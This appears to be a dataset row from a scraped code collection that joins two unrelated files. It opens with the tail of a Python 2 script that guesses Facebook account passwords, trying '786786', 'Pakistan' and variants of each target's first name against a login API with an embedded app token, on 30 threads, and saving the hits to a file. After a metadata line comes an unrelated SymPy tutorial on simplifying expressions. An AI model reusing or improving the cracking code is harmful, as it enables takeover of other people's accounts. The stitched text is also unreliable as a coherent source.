user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name'] + '12'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name'] + '1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mProcess Has Been Completed \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File Has Been Saved \033[1;91m: \033[1;97mout/checkpoint.txt")
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | noreply@github.com |
ebfa26f25eb795d6535f7e5c1730227ce0696442 | a75d22f5c3c10c601a800b973544b0cc25e446f9 | /NA_1_Preliminary/chap3_1.CAS_simplify.py | 6565c22672d5e3905fcbf33e04aaad721d44eb2a | [] | no_license | jsm2371/Computation | 71cf0c811e8068f45c2eee8882a31ea9c98b9bb0 | 5d3a920132065dcf4e4993e37df539458a632c17 | refs/heads/master | 2023-02-02T23:05:13.405720 | 2020-12-12T11:20:28 | 2020-12-12T11:20:28 | 297,341,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 857 | py | import sympy
from sympy import I, pi, oo

sympy.init_printing()

#### Expression simplification ####
# sympy.simplify(expr)  - general simplification (relies on heuristics)
# expr.simplify()       - method form of the same operation
# sympy.trigsimp(expr)  - specialised for trigonometric expressions
# sympy.powsimp(expr)   - specialised for powers/exponentials
# sympy.compsimp(expr)  - specialised for combinatorial expressions
# sympy.ratsimp(expr)   - rewrites over a common denominator
#### Expression simplification ####

print(">>> 수식 단순화 <<<")
x, y = sympy.symbols("x, y")
polynomial = 2 * (x**2 - x) - x * (x + 1)
print(polynomial)
print(sympy.simplify(polynomial))    # function form
print(polynomial.simplify())         # method form, same result
print(polynomial)                    # unchanged: simplify() does not mutate

print("\n" + ">>> 수식 단순화2 <<<")
double_angle = 2 * sympy.cos(x) * sympy.sin(x)
print(double_angle)
print(sympy.simplify(double_angle))
print(sympy.trigsimp(double_angle))  # recognises the sin(2*x) identity

print("\n" + ">>> 수식 단순화3 <<<")
exp_product = sympy.exp(x) * sympy.exp(y)
print(exp_product)
print(sympy.simplify(exp_product))
print(sympy.powsimp(exp_product))    # combines exp(x)*exp(y) -> exp(x + y)
| [
"jsm2371@hanmail.net"
] | jsm2371@hanmail.net |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.